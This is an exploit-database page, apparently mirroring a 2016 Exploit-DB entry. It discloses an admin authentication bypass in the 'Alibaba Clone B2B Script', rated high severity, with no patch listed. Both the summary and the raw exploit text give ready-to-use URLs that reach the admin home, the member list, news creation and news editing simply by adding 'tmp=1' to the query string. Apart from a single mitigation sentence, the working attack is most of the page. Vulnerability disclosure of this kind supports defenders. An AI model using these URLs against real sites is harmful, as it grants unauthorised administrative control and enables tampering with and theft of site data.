header-logo
Suggest Exploit
vendor:
B2B Script
by:
Meisam Monsef
7,5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: B2B Script
Affected Version From: All Versions
Affected Version To: All Versions
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2016

Alibaba Clone B2B Script Admin Authentication Bypass

For enter, simply enter the following code http://server/admin/adminhome.php?tmp=1. For each page is enough to add the following code to the end of url example see page members: http://server/admin/members.php?tmp=1 or add a new news: http://server/admin/hot_news_menu.php?tmp=1 or edit news: http://server/admin/edit_hot_news.php?hotnewsid=44&tmp=1

Mitigation:

Ensure that authentication is properly implemented and enforced for all administrative functions.
Source

Exploit-DB raw data:

# Exploit Title: Alibaba Clone B2B Script Admin Authentication Bypass
# Date: 2016-05-03
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage: http://alibaba-clone.com/
# Version: All Versions

Exploit :
For enter , simply enter the following code
http://server/admin/adminhome.php?tmp=1

For each page is enough to add the following code to the end of url
example see page members :
http://server/admin/members.php?tmp=1

or add a new news :
http://server/admin/hot_news_menu.php?tmp=1

or edit news :
http://server/admin/edit_hot_news.php?hotnewsid=44&tmp=1

Navigation

Suggest Exploit

Services By CQR